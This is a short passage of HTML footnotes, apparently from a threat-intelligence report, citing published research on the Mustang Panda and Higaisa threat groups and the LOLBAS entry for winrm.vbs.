<a href="https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations">https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations</a>.</p><p><sup>[7]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private 
Sector Organizations,” Anomali Blog.</p><p><sup>[8]</sup> “winrm.vbs,” Living Off The Land Binaries and Scripts (and also Libraries), accessed March 20, 2020, <a href="https://lolbas-project.github.io/lolbas/Scripts/Winrm/" target="_blank">https://lolbas-project.github.io/lolbas/Scripts/Winrm/</a>.</p><p><sup>[9]</sup> “‘Higaisa’ Recent Attack Activity Report,” Tencent Security Threat Intelligence Center, accessed March 18, 2020, published February 27, 2020, <a href="https://s.tencent.com/research/report/895.html" target="_blank">https://s.tencent.com/research/report/895.html</a>.</p>
